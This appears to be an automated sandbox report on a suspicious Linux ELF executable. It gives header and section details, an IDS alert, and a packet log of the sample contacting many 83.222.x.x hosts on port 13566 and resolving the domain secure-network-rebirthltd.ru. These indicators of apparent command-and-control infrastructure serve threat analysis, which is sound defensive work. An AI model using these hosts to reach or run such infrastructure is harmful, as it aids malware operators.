Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x100001f0
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	46488
Section Header Size:	40
Number of Section Headers:	12
Header String Table Index:	11

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x10000094	0x94	0x24	0x0	0x6	AX	4
.text	PROGBITS	0x100000b8	0xb8	0xacb8	0x0	0x6	AX	4
.fini	PROGBITS	0x1000ad70	0xad70	0x20	0x0	0x6	AX	4
.rodata	PROGBITS	0x1000ad90	0xad90	0x564	0x0	0x2	A	4
.ctors	PROGBITS	0x1001b2f8	0xb2f8	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x1001b300	0xb300	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x1001b310	0xb310	0x224	0x0	0x3	WA	8
.sdata	PROGBITS	0x1001b534	0xb534	0x18	0x0	0x3	WA	4
.sbss	NOBITS	0x1001b54c	0xb54c	0x58	0x0	0x3	WA	4
.bss	NOBITS	0x1001b5a4	0xb54c	0x110c	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0xb54c	0x4b	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x10000000	0x10000000	0xb2f4	0xb2f4	6.2358	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0xb2f8	0x1001b2f8	0x1001b2f8	0x254	0x13b8	3.2189	0x6	RW	0x10000	.ctors .dtors .data .sdata .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-19T03:52:57.822655+0100	2500034	ET COMPROMISED Known Compromised or Hostile Host Traffic group 18	2	83.222.191.90	13566	192.168.2.13	42836	TCP

Network Port Distribution

Total Packets: 197
• 13566 undefined
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 19, 2025 03:52:57.521219015 CET	45480	13566	192.168.2.13	83.222.143.218
Jan 19, 2025 03:52:57.526565075 CET	13566	45480	83.222.143.218	192.168.2.13
Jan 19, 2025 03:52:57.526667118 CET	45480	13566	192.168.2.13	83.222.143.218
Jan 19, 2025 03:52:57.542130947 CET	43424	13566	192.168.2.13	83.222.152.210
Jan 19, 2025 03:52:57.547339916 CET	13566	43424	83.222.152.210	192.168.2.13
Jan 19, 2025 03:52:57.547396898 CET	43424	13566	192.168.2.13	83.222.152.210
Jan 19, 2025 03:52:57.559035063 CET	43424	13566	192.168.2.13	83.222.152.210
Jan 19, 2025 03:52:57.564073086 CET	13566	43424	83.222.152.210	192.168.2.13
Jan 19, 2025 03:52:57.564152956 CET	43424	13566	192.168.2.13	83.222.152.210
Jan 19, 2025 03:52:57.575201988 CET	56100	13566	192.168.2.13	83.222.129.82
Jan 19, 2025 03:52:57.580095053 CET	13566	56100	83.222.129.82	192.168.2.13
Jan 19, 2025 03:52:57.580151081 CET	56100	13566	192.168.2.13	83.222.129.82
Jan 19, 2025 03:52:57.582454920 CET	37794	13566	192.168.2.13	83.222.162.35
Jan 19, 2025 03:52:57.585428953 CET	43684	13566	192.168.2.13	83.222.77.61
Jan 19, 2025 03:52:57.586627960 CET	35088	13566	192.168.2.13	83.222.255.25
Jan 19, 2025 03:52:57.587356091 CET	13566	37794	83.222.162.35	192.168.2.13
Jan 19, 2025 03:52:57.587416887 CET	37794	13566	192.168.2.13	83.222.162.35
Jan 19, 2025 03:52:57.590672016 CET	13566	43684	83.222.77.61	192.168.2.13
Jan 19, 2025 03:52:57.590743065 CET	43684	13566	192.168.2.13	83.222.77.61
Jan 19, 2025 03:52:57.591634989 CET	13566	35088	83.222.255.25	192.168.2.13
Jan 19, 2025 03:52:57.591679096 CET	35088	13566	192.168.2.13	83.222.255.25
Jan 19, 2025 03:52:57.599535942 CET	35088	13566	192.168.2.13	83.222.255.25
Jan 19, 2025 03:52:57.601533890 CET	39514	13566	192.168.2.13	83.222.80.100
Jan 19, 2025 03:52:57.604127884 CET	35214	13566	192.168.2.13	83.222.63.114
Jan 19, 2025 03:52:57.604679108 CET	13566	35088	83.222.255.25	192.168.2.13
Jan 19, 2025 03:52:57.604729891 CET	35088	13566	192.168.2.13	83.222.255.25
Jan 19, 2025 03:52:57.606606960 CET	13566	39514	83.222.80.100	192.168.2.13
Jan 19, 2025 03:52:57.606786966 CET	39514	13566	192.168.2.13	83.222.80.100
Jan 19, 2025 03:52:57.609026909 CET	13566	35214	83.222.63.114	192.168.2.13
Jan 19, 2025 03:52:57.609119892 CET	35214	13566	192.168.2.13	83.222.63.114
Jan 19, 2025 03:52:57.617618084 CET	33640	13566	192.168.2.13	83.222.36.180
Jan 19, 2025 03:52:57.620186090 CET	60708	13566	192.168.2.13	83.222.37.148
Jan 19, 2025 03:52:57.622258902 CET	53760	13566	192.168.2.13	83.222.206.240
Jan 19, 2025 03:52:57.622684956 CET	13566	33640	83.222.36.180	192.168.2.13
Jan 19, 2025 03:52:57.622726917 CET	33640	13566	192.168.2.13	83.222.36.180
Jan 19, 2025 03:52:57.624465942 CET	39412	13566	192.168.2.13	83.222.148.57
Jan 19, 2025 03:52:57.625390053 CET	13566	60708	83.222.37.148	192.168.2.13
Jan 19, 2025 03:52:57.625430107 CET	60708	13566	192.168.2.13	83.222.37.148
Jan 19, 2025 03:52:57.626549006 CET	39638	13566	192.168.2.13	83.222.175.144
Jan 19, 2025 03:52:57.627270937 CET	13566	53760	83.222.206.240	192.168.2.13
Jan 19, 2025 03:52:57.627309084 CET	53760	13566	192.168.2.13	83.222.206.240
Jan 19, 2025 03:52:57.629276037 CET	37540	13566	192.168.2.13	83.222.112.243
Jan 19, 2025 03:52:57.629317045 CET	13566	39412	83.222.148.57	192.168.2.13
Jan 19, 2025 03:52:57.629365921 CET	39412	13566	192.168.2.13	83.222.148.57
Jan 19, 2025 03:52:57.631402016 CET	13566	39638	83.222.175.144	192.168.2.13
Jan 19, 2025 03:52:57.631453991 CET	39638	13566	192.168.2.13	83.222.175.144
Jan 19, 2025 03:52:57.631701946 CET	54900	13566	192.168.2.13	83.222.40.150
Jan 19, 2025 03:52:57.633882999 CET	57254	13566	192.168.2.13	83.222.106.184
Jan 19, 2025 03:52:57.634155989 CET	13566	37540	83.222.112.243	192.168.2.13
Jan 19, 2025 03:52:57.634206057 CET	37540	13566	192.168.2.13	83.222.112.243
Jan 19, 2025 03:52:57.636533022 CET	13566	54900	83.222.40.150	192.168.2.13
Jan 19, 2025 03:52:57.636580944 CET	54900	13566	192.168.2.13	83.222.40.150
Jan 19, 2025 03:52:57.636770964 CET	33838	13566	192.168.2.13	83.222.113.2
Jan 19, 2025 03:52:57.638747931 CET	13566	57254	83.222.106.184	192.168.2.13
Jan 19, 2025 03:52:57.638796091 CET	57254	13566	192.168.2.13	83.222.106.184
Jan 19, 2025 03:52:57.639836073 CET	56348	13566	192.168.2.13	83.222.138.242
Jan 19, 2025 03:52:57.640564919 CET	33758	13566	192.168.2.13	83.222.84.45
Jan 19, 2025 03:52:57.641711950 CET	13566	33838	83.222.113.2	192.168.2.13
Jan 19, 2025 03:52:57.641879082 CET	33838	13566	192.168.2.13	83.222.113.2
Jan 19, 2025 03:52:57.643811941 CET	36824	13566	192.168.2.13	83.222.21.162
Jan 19, 2025 03:52:57.644728899 CET	13566	56348	83.222.138.242	192.168.2.13
Jan 19, 2025 03:52:57.644785881 CET	56348	13566	192.168.2.13	83.222.138.242
Jan 19, 2025 03:52:57.645457029 CET	13566	33758	83.222.84.45	192.168.2.13
Jan 19, 2025 03:52:57.645505905 CET	33758	13566	192.168.2.13	83.222.84.45
Jan 19, 2025 03:52:57.646214962 CET	48348	13566	192.168.2.13	83.222.106.20
Jan 19, 2025 03:52:57.647448063 CET	51564	13566	192.168.2.13	83.222.187.186
Jan 19, 2025 03:52:57.648664951 CET	37752	13566	192.168.2.13	83.222.120.250
Jan 19, 2025 03:52:57.648691893 CET	13566	36824	83.222.21.162	192.168.2.13
Jan 19, 2025 03:52:57.648737907 CET	36824	13566	192.168.2.13	83.222.21.162
Jan 19, 2025 03:52:57.651026964 CET	13566	48348	83.222.106.20	192.168.2.13
Jan 19, 2025 03:52:57.651127100 CET	48348	13566	192.168.2.13	83.222.106.20
Jan 19, 2025 03:52:57.652014017 CET	53896	13566	192.168.2.13	83.222.44.157
Jan 19, 2025 03:52:57.652379036 CET	13566	51564	83.222.187.186	192.168.2.13
Jan 19, 2025 03:52:57.652591944 CET	51564	13566	192.168.2.13	83.222.187.186
Jan 19, 2025 03:52:57.653577089 CET	13566	37752	83.222.120.250	192.168.2.13
Jan 19, 2025 03:52:57.653731108 CET	37752	13566	192.168.2.13	83.222.120.250
Jan 19, 2025 03:52:57.653990984 CET	41010	13566	192.168.2.13	83.222.175.81
Jan 19, 2025 03:52:57.655251026 CET	42486	13566	192.168.2.13	83.222.49.125
Jan 19, 2025 03:52:57.656138897 CET	46094	13566	192.168.2.13	83.222.66.197
Jan 19, 2025 03:52:57.657180071 CET	13566	53896	83.222.44.157	192.168.2.13
Jan 19, 2025 03:52:57.657238007 CET	53896	13566	192.168.2.13	83.222.44.157
Jan 19, 2025 03:52:57.657289028 CET	56322	13566	192.168.2.13	83.222.182.241
Jan 19, 2025 03:52:57.658876896 CET	13566	41010	83.222.175.81	192.168.2.13
Jan 19, 2025 03:52:57.658926964 CET	41010	13566	192.168.2.13	83.222.175.81
Jan 19, 2025 03:52:57.660202980 CET	13566	42486	83.222.49.125	192.168.2.13
Jan 19, 2025 03:52:57.660275936 CET	42486	13566	192.168.2.13	83.222.49.125
Jan 19, 2025 03:52:57.661077023 CET	13566	46094	83.222.66.197	192.168.2.13
Jan 19, 2025 03:52:57.661148071 CET	46094	13566	192.168.2.13	83.222.66.197
Jan 19, 2025 03:52:57.662148952 CET	13566	56322	83.222.182.241	192.168.2.13
Jan 19, 2025 03:52:57.662199974 CET	56322	13566	192.168.2.13	83.222.182.241
Jan 19, 2025 03:52:57.672700882 CET	56322	13566	192.168.2.13	83.222.182.241
Jan 19, 2025 03:52:57.673069954 CET	59254	13566	192.168.2.13	83.222.85.39
Jan 19, 2025 03:52:57.673492908 CET	37618	13566	192.168.2.13	83.222.229.126
Jan 19, 2025 03:52:57.674073935 CET	54974	13566	192.168.2.13	83.222.189.79
Jan 19, 2025 03:52:57.677840948 CET	13566	56322	83.222.182.241	192.168.2.13
Jan 19, 2025 03:52:57.677897930 CET	56322	13566	192.168.2.13	83.222.182.241
Jan 19, 2025 03:52:57.678037882 CET	13566	59254	83.222.85.39	192.168.2.13
Jan 19, 2025 03:52:57.678098917 CET	59254	13566	192.168.2.13	83.222.85.39
Jan 19, 2025 03:52:57.678329945 CET	13566	37618	83.222.229.126	192.168.2.13
Jan 19, 2025 03:52:57.678411007 CET	37618	13566	192.168.2.13	83.222.229.126
Jan 19, 2025 03:52:57.678905964 CET	13566	54974	83.222.189.79	192.168.2.13
Jan 19, 2025 03:52:57.678952932 CET	54974	13566	192.168.2.13	83.222.189.79
Jan 19, 2025 03:52:57.686218977 CET	54974	13566	192.168.2.13	83.222.189.79
Jan 19, 2025 03:52:57.689302921 CET	43248	13566	192.168.2.13	83.222.54.46
Jan 19, 2025 03:52:57.689989090 CET	60360	13566	192.168.2.13	83.222.82.192
Jan 19, 2025 03:52:57.691155910 CET	13566	54974	83.222.189.79	192.168.2.13
Jan 19, 2025 03:52:57.691229105 CET	54974	13566	192.168.2.13	83.222.189.79
Jan 19, 2025 03:52:57.694210052 CET	13566	43248	83.222.54.46	192.168.2.13
Jan 19, 2025 03:52:57.694255114 CET	43248	13566	192.168.2.13	83.222.54.46
Jan 19, 2025 03:52:57.694890022 CET	13566	60360	83.222.82.192	192.168.2.13
Jan 19, 2025 03:52:57.694933891 CET	60360	13566	192.168.2.13	83.222.82.192
Jan 19, 2025 03:52:57.705187082 CET	46042	13566	192.168.2.13	83.222.32.166
Jan 19, 2025 03:52:57.708882093 CET	37920	13566	192.168.2.13	83.222.237.53
Jan 19, 2025 03:52:57.710097075 CET	13566	46042	83.222.32.166	192.168.2.13
Jan 19, 2025 03:52:57.710184097 CET	46042	13566	192.168.2.13	83.222.32.166
Jan 19, 2025 03:52:57.711461067 CET	32796	13566	192.168.2.13	83.222.72.87
Jan 19, 2025 03:52:57.713547945 CET	36602	13566	192.168.2.13	83.222.74.4
Jan 19, 2025 03:52:57.713784933 CET	13566	37920	83.222.237.53	192.168.2.13
Jan 19, 2025 03:52:57.713843107 CET	37920	13566	192.168.2.13	83.222.237.53
Jan 19, 2025 03:52:57.715814114 CET	48868	13566	192.168.2.13	83.222.17.194
Jan 19, 2025 03:52:57.716387987 CET	13566	32796	83.222.72.87	192.168.2.13
Jan 19, 2025 03:52:57.716439962 CET	32796	13566	192.168.2.13	83.222.72.87
Jan 19, 2025 03:52:57.716974974 CET	51984	13566	192.168.2.13	83.222.254.61
Jan 19, 2025 03:52:57.717689037 CET	34680	13566	192.168.2.13	83.222.95.173
Jan 19, 2025 03:52:57.718358040 CET	13566	36602	83.222.74.4	192.168.2.13
Jan 19, 2025 03:52:57.718406916 CET	36602	13566	192.168.2.13	83.222.74.4
Jan 19, 2025 03:52:57.718472004 CET	44624	13566	192.168.2.13	83.222.143.144
Jan 19, 2025 03:52:57.720685005 CET	13566	48868	83.222.17.194	192.168.2.13
Jan 19, 2025 03:52:57.720745087 CET	48868	13566	192.168.2.13	83.222.17.194
Jan 19, 2025 03:52:57.721801996 CET	13566	51984	83.222.254.61	192.168.2.13
Jan 19, 2025 03:52:57.721892118 CET	51984	13566	192.168.2.13	83.222.254.61
Jan 19, 2025 03:52:57.722527981 CET	13566	34680	83.222.95.173	192.168.2.13
Jan 19, 2025 03:52:57.722613096 CET	34680	13566	192.168.2.13	83.222.95.173
Jan 19, 2025 03:52:57.723272085 CET	13566	44624	83.222.143.144	192.168.2.13
Jan 19, 2025 03:52:57.723340988 CET	44624	13566	192.168.2.13	83.222.143.144
Jan 19, 2025 03:52:57.729427099 CET	44624	13566	192.168.2.13	83.222.143.144
Jan 19, 2025 03:52:57.730390072 CET	44806	13566	192.168.2.13	83.222.43.209
Jan 19, 2025 03:52:57.732620955 CET	34100	13566	192.168.2.13	83.222.86.225
Jan 19, 2025 03:52:57.733913898 CET	34360	13566	192.168.2.13	83.222.194.171
Jan 19, 2025 03:52:57.734399080 CET	13566	44624	83.222.143.144	192.168.2.13
Jan 19, 2025 03:52:57.734453917 CET	44624	13566	192.168.2.13	83.222.143.144
Jan 19, 2025 03:52:57.734771967 CET	35410	13566	192.168.2.13	83.222.8.167
Jan 19, 2025 03:52:57.735224962 CET	13566	44806	83.222.43.209	192.168.2.13
Jan 19, 2025 03:52:57.735266924 CET	44806	13566	192.168.2.13	83.222.43.209
Jan 19, 2025 03:52:57.737500906 CET	13566	34100	83.222.86.225	192.168.2.13
Jan 19, 2025 03:52:57.737631083 CET	34100	13566	192.168.2.13	83.222.86.225
Jan 19, 2025 03:52:57.738775015 CET	13566	34360	83.222.194.171	192.168.2.13
Jan 19, 2025 03:52:57.738923073 CET	34360	13566	192.168.2.13	83.222.194.171
Jan 19, 2025 03:52:57.739612103 CET	13566	35410	83.222.8.167	192.168.2.13
Jan 19, 2025 03:52:57.739666939 CET	35410	13566	192.168.2.13	83.222.8.167
Jan 19, 2025 03:52:57.745340109 CET	37940	13566	192.168.2.13	83.222.41.198
Jan 19, 2025 03:52:57.747090101 CET	37922	13566	192.168.2.13	83.222.247.95
Jan 19, 2025 03:52:57.749247074 CET	36418	13566	192.168.2.13	83.222.244.73
Jan 19, 2025 03:52:57.750256062 CET	13566	37940	83.222.41.198	192.168.2.13
Jan 19, 2025 03:52:57.750310898 CET	37940	13566	192.168.2.13	83.222.41.198
Jan 19, 2025 03:52:57.750653028 CET	54926	13566	192.168.2.13	83.222.32.21
Jan 19, 2025 03:52:57.751936913 CET	46276	13566	192.168.2.13	83.222.239.13
Jan 19, 2025 03:52:57.751945972 CET	13566	37922	83.222.247.95	192.168.2.13
Jan 19, 2025 03:52:57.751998901 CET	37922	13566	192.168.2.13	83.222.247.95
Jan 19, 2025 03:52:57.753736973 CET	58912	13566	192.168.2.13	83.222.74.56
Jan 19, 2025 03:52:57.754158020 CET	13566	36418	83.222.244.73	192.168.2.13
Jan 19, 2025 03:52:57.754293919 CET	36418	13566	192.168.2.13	83.222.244.73
Jan 19, 2025 03:52:57.755525112 CET	13566	54926	83.222.32.21	192.168.2.13
Jan 19, 2025 03:52:57.755580902 CET	54926	13566	192.168.2.13	83.222.32.21
Jan 19, 2025 03:52:57.755947113 CET	43104	13566	192.168.2.13	83.222.101.148
Jan 19, 2025 03:52:57.756917000 CET	13566	46276	83.222.239.13	192.168.2.13
Jan 19, 2025 03:52:57.757015944 CET	46276	13566	192.168.2.13	83.222.239.13
Jan 19, 2025 03:52:57.757636070 CET	50650	13566	192.168.2.13	83.222.60.118
Jan 19, 2025 03:52:57.758636951 CET	13566	58912	83.222.74.56	192.168.2.13
Jan 19, 2025 03:52:57.758682013 CET	58912	13566	192.168.2.13	83.222.74.56
Jan 19, 2025 03:52:57.759711027 CET	53506	13566	192.168.2.13	83.222.87.58
Jan 19, 2025 03:52:57.760776043 CET	13566	43104	83.222.101.148	192.168.2.13
Jan 19, 2025 03:52:57.760821104 CET	43104	13566	192.168.2.13	83.222.101.148
Jan 19, 2025 03:52:57.761125088 CET	56468	13566	192.168.2.13	83.222.180.182
Jan 19, 2025 03:52:57.762490034 CET	13566	50650	83.222.60.118	192.168.2.13
Jan 19, 2025 03:52:57.762531042 CET	50650	13566	192.168.2.13	83.222.60.118
Jan 19, 2025 03:52:57.762876987 CET	57750	13566	192.168.2.13	83.222.232.67
Jan 19, 2025 03:52:57.764533043 CET	13566	53506	83.222.87.58	192.168.2.13
Jan 19, 2025 03:52:57.764666080 CET	53506	13566	192.168.2.13	83.222.87.58
Jan 19, 2025 03:52:57.764729977 CET	39222	13566	192.168.2.13	83.222.71.19
Jan 19, 2025 03:52:57.766016006 CET	13566	56468	83.222.180.182	192.168.2.13
Jan 19, 2025 03:52:57.766063929 CET	56468	13566	192.168.2.13	83.222.180.182
Jan 19, 2025 03:52:57.766712904 CET	36050	13566	192.168.2.13	83.222.20.157
Jan 19, 2025 03:52:57.767627001 CET	13566	57750	83.222.232.67	192.168.2.13
Jan 19, 2025 03:52:57.767683983 CET	57750	13566	192.168.2.13	83.222.232.67
Jan 19, 2025 03:52:57.768157005 CET	55966	13566	192.168.2.13	83.222.244.214
Jan 19, 2025 03:52:57.769551992 CET	13566	39222	83.222.71.19	192.168.2.13
Jan 19, 2025 03:52:57.769598007 CET	39222	13566	192.168.2.13	83.222.71.19
Jan 19, 2025 03:52:57.770315886 CET	42352	13566	192.168.2.13	83.222.72.253
Jan 19, 2025 03:52:57.771625996 CET	13566	36050	83.222.20.157	192.168.2.13
Jan 19, 2025 03:52:57.771814108 CET	36050	13566	192.168.2.13	83.222.20.157
Jan 19, 2025 03:52:57.772670984 CET	33100	13566	192.168.2.13	83.222.126.114
Jan 19, 2025 03:52:57.773067951 CET	13566	55966	83.222.244.214	192.168.2.13
Jan 19, 2025 03:52:57.773123980 CET	55966	13566	192.168.2.13	83.222.244.214
Jan 19, 2025 03:52:57.774234056 CET	49972	13566	192.168.2.13	83.222.195.117
Jan 19, 2025 03:52:57.775206089 CET	13566	42352	83.222.72.253	192.168.2.13
Jan 19, 2025 03:52:57.775249958 CET	42352	13566	192.168.2.13	83.222.72.253
Jan 19, 2025 03:52:57.776529074 CET	53482	13566	192.168.2.13	83.222.209.183
Jan 19, 2025 03:52:57.777539015 CET	13566	33100	83.222.126.114	192.168.2.13
Jan 19, 2025 03:52:57.777625084 CET	33100	13566	192.168.2.13	83.222.126.114
Jan 19, 2025 03:52:57.778096914 CET	54090	13566	192.168.2.13	83.222.190.241
Jan 19, 2025 03:52:57.779031992 CET	13566	49972	83.222.195.117	192.168.2.13
Jan 19, 2025 03:52:57.779076099 CET	49972	13566	192.168.2.13	83.222.195.117
Jan 19, 2025 03:52:57.779994011 CET	58102	13566	192.168.2.13	83.222.204.173
Jan 19, 2025 03:52:57.781131029 CET	33504	13566	192.168.2.13	83.222.255.23
Jan 19, 2025 03:52:57.781377077 CET	13566	53482	83.222.209.183	192.168.2.13
Jan 19, 2025 03:52:57.781424999 CET	53482	13566	192.168.2.13	83.222.209.183
Jan 19, 2025 03:52:57.782942057 CET	13566	54090	83.222.190.241	192.168.2.13
Jan 19, 2025 03:52:57.782987118 CET	54090	13566	192.168.2.13	83.222.190.241
Jan 19, 2025 03:52:57.783783913 CET	54868	13566	192.168.2.13	83.222.229.100
Jan 19, 2025 03:52:57.784837008 CET	13566	58102	83.222.204.173	192.168.2.13
Jan 19, 2025 03:52:57.784883022 CET	58102	13566	192.168.2.13	83.222.204.173
Jan 19, 2025 03:52:57.785976887 CET	13566	33504	83.222.255.23	192.168.2.13
Jan 19, 2025 03:52:57.786026955 CET	33504	13566	192.168.2.13	83.222.255.23
Jan 19, 2025 03:52:57.786109924 CET	60878	13566	192.168.2.13	83.222.171.33
Jan 19, 2025 03:52:57.788239956 CET	58142	13566	192.168.2.13	83.222.218.2
Jan 19, 2025 03:52:57.789755106 CET	42224	13566	192.168.2.13	83.222.92.142
Jan 19, 2025 03:52:57.790713072 CET	39946	13566	192.168.2.13	83.222.185.68
Jan 19, 2025 03:52:57.791573048 CET	54224	13566	192.168.2.13	83.222.209.0
Jan 19, 2025 03:52:57.792402983 CET	34506	13566	192.168.2.13	83.222.87.229
Jan 19, 2025 03:52:57.793436050 CET	52768	13566	192.168.2.13	83.222.157.75
Jan 19, 2025 03:52:57.793744087 CET	13566	54868	83.222.229.100	192.168.2.13
Jan 19, 2025 03:52:57.793773890 CET	13566	60878	83.222.171.33	192.168.2.13
Jan 19, 2025 03:52:57.793793917 CET	54868	13566	192.168.2.13	83.222.229.100
Jan 19, 2025 03:52:57.793802977 CET	13566	58142	83.222.218.2	192.168.2.13
Jan 19, 2025 03:52:57.793819904 CET	60878	13566	192.168.2.13	83.222.171.33
Jan 19, 2025 03:52:57.793951988 CET	58142	13566	192.168.2.13	83.222.218.2
Jan 19, 2025 03:52:57.794218063 CET	45296	13566	192.168.2.13	83.222.188.229
Jan 19, 2025 03:52:57.795406103 CET	46180	13566	192.168.2.13	83.222.72.58
Jan 19, 2025 03:52:57.796361923 CET	45092	13566	192.168.2.13	83.222.87.11
Jan 19, 2025 03:52:57.797342062 CET	60528	13566	192.168.2.13	83.222.175.41
Jan 19, 2025 03:52:57.798384905 CET	40924	13566	192.168.2.13	83.222.195.109
Jan 19, 2025 03:52:57.798692942 CET	13566	42224	83.222.92.142	192.168.2.13
Jan 19, 2025 03:52:57.798722982 CET	13566	39946	83.222.185.68	192.168.2.13
Jan 19, 2025 03:52:57.798743963 CET	42224	13566	192.168.2.13	83.222.92.142
Jan 19, 2025 03:52:57.798751116 CET	13566	54224	83.222.209.0	192.168.2.13
Jan 19, 2025 03:52:57.798780918 CET	13566	34506	83.222.87.229	192.168.2.13
Jan 19, 2025 03:52:57.798788071 CET	54224	13566	192.168.2.13	83.222.209.0
Jan 19, 2025 03:52:57.798810005 CET	13566	52768	83.222.157.75	192.168.2.13
Jan 19, 2025 03:52:57.798839092 CET	34506	13566	192.168.2.13	83.222.87.229
Jan 19, 2025 03:52:57.798844099 CET	52768	13566	192.168.2.13	83.222.157.75
Jan 19, 2025 03:52:57.798887968 CET	39946	13566	192.168.2.13	83.222.185.68
Jan 19, 2025 03:52:57.799040079 CET	13566	45296	83.222.188.229	192.168.2.13
Jan 19, 2025 03:52:57.799088001 CET	45296	13566	192.168.2.13	83.222.188.229
Jan 19, 2025 03:52:57.799159050 CET	55062	13566	192.168.2.13	83.222.26.143
Jan 19, 2025 03:52:57.799789906 CET	33650	13566	192.168.2.13	83.222.26.25
Jan 19, 2025 03:52:57.800311089 CET	13566	46180	83.222.72.58	192.168.2.13
Jan 19, 2025 03:52:57.800355911 CET	46180	13566	192.168.2.13	83.222.72.58
Jan 19, 2025 03:52:57.800734043 CET	57620	13566	192.168.2.13	83.222.166.0
Jan 19, 2025 03:52:57.801243067 CET	13566	45092	83.222.87.11	192.168.2.13
Jan 19, 2025 03:52:57.801280975 CET	45092	13566	192.168.2.13	83.222.87.11
Jan 19, 2025 03:52:57.801707983 CET	46276	13566	192.168.2.13	83.222.125.82
Jan 19, 2025 03:52:57.802220106 CET	13566	60528	83.222.175.41	192.168.2.13
Jan 19, 2025 03:52:57.802278996 CET	60528	13566	192.168.2.13	83.222.175.41
Jan 19, 2025 03:52:57.803226948 CET	13566	40924	83.222.195.109	192.168.2.13
Jan 19, 2025 03:52:57.803272963 CET	40924	13566	192.168.2.13	83.222.195.109
Jan 19, 2025 03:52:57.803342104 CET	38084	13566	192.168.2.13	83.222.33.88
Jan 19, 2025 03:52:57.803944111 CET	13566	55062	83.222.26.143	192.168.2.13
Jan 19, 2025 03:52:57.803989887 CET	55062	13566	192.168.2.13	83.222.26.143
Jan 19, 2025 03:52:57.804367065 CET	59930	13566	192.168.2.13	83.222.84.125
Jan 19, 2025 03:52:57.804590940 CET	13566	33650	83.222.26.25	192.168.2.13
Jan 19, 2025 03:52:57.804675102 CET	33650	13566	192.168.2.13	83.222.26.25
Jan 19, 2025 03:52:57.805332899 CET	51128	13566	192.168.2.13	83.222.230.13
Jan 19, 2025 03:52:57.805645943 CET	13566	57620	83.222.166.0	192.168.2.13
Jan 19, 2025 03:52:57.805697918 CET	57620	13566	192.168.2.13	83.222.166.0
Jan 19, 2025 03:52:57.806545019 CET	47360	13566	192.168.2.13	83.222.193.184
Jan 19, 2025 03:52:57.806598902 CET	13566	46276	83.222.125.82	192.168.2.13
Jan 19, 2025 03:52:57.806673050 CET	46276	13566	192.168.2.13	83.222.125.82
Jan 19, 2025 03:52:57.807411909 CET	41722	13566	192.168.2.13	83.222.13.24
Jan 19, 2025 03:52:57.808159113 CET	13566	38084	83.222.33.88	192.168.2.13
Jan 19, 2025 03:52:57.808203936 CET	38084	13566	192.168.2.13	83.222.33.88
Jan 19, 2025 03:52:57.809242964 CET	13566	59930	83.222.84.125	192.168.2.13
Jan 19, 2025 03:52:57.809295893 CET	59930	13566	192.168.2.13	83.222.84.125
Jan 19, 2025 03:52:57.810272932 CET	13566	51128	83.222.230.13	192.168.2.13
Jan 19, 2025 03:52:57.810338974 CET	51128	13566	192.168.2.13	83.222.230.13
Jan 19, 2025 03:52:57.811458111 CET	13566	47360	83.222.193.184	192.168.2.13
Jan 19, 2025 03:52:57.811506033 CET	47360	13566	192.168.2.13	83.222.193.184
Jan 19, 2025 03:52:57.812215090 CET	13566	41722	83.222.13.24	192.168.2.13
Jan 19, 2025 03:52:57.812278986 CET	41722	13566	192.168.2.13	83.222.13.24
Jan 19, 2025 03:52:57.817553043 CET	42836	13566	192.168.2.13	83.222.191.90
Jan 19, 2025 03:52:57.822654963 CET	13566	42836	83.222.191.90	192.168.2.13
Jan 19, 2025 03:52:57.822916985 CET	42836	13566	192.168.2.13	83.222.191.90
Jan 19, 2025 03:52:57.823642969 CET	42836	13566	192.168.2.13	83.222.191.90
Jan 19, 2025 03:52:57.828882933 CET	13566	42836	83.222.191.90	192.168.2.13
Jan 19, 2025 03:52:57.829176903 CET	42836	13566	192.168.2.13	83.222.191.90
Jan 19, 2025 03:52:57.834553957 CET	13566	42836	83.222.191.90	192.168.2.13
Jan 19, 2025 03:53:07.833956003 CET	42836	13566	192.168.2.13	83.222.191.90
Jan 19, 2025 03:53:07.840413094 CET	13566	42836	83.222.191.90	192.168.2.13
Jan 19, 2025 03:53:08.045028925 CET	13566	42836	83.222.191.90	192.168.2.13
Jan 19, 2025 03:53:08.045233011 CET	42836	13566	192.168.2.13	83.222.191.90
Jan 19, 2025 03:53:08.445049047 CET	13566	42836	83.222.191.90	192.168.2.13
Jan 19, 2025 03:53:08.445380926 CET	42836	13566	192.168.2.13	83.222.191.90
Jan 19, 2025 03:54:08.503264904 CET	42836	13566	192.168.2.13	83.222.191.90
Jan 19, 2025 03:54:08.508483887 CET	13566	42836	83.222.191.90	192.168.2.13
Jan 19, 2025 03:54:08.699491978 CET	13566	42836	83.222.191.90	192.168.2.13
Jan 19, 2025 03:54:08.699801922 CET	42836	13566	192.168.2.13	83.222.191.90
Jan 19, 2025 03:54:09.442231894 CET	13566	42836	83.222.191.90	192.168.2.13
Jan 19, 2025 03:54:09.442678928 CET	42836	13566	192.168.2.13	83.222.191.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 19, 2025 03:52:57.809637070 CET	49301	53	192.168.2.13	8.8.8.8
Jan 19, 2025 03:52:57.816600084 CET	53	49301	8.8.8.8	192.168.2.13

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 19, 2025 03:52:57.809637070 CET	192.168.2.13	8.8.8.8	0xa794	Standard query (0)	secure-network-rebirthltd.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 19, 2025 03:52:57.816600084 CET	8.8.8.8	192.168.2.13	0xa794	No error (0)	secure-network-rebirthltd.ru		83.222.191.90	A (IP address)	IN (0x0001)	false

System Behavior

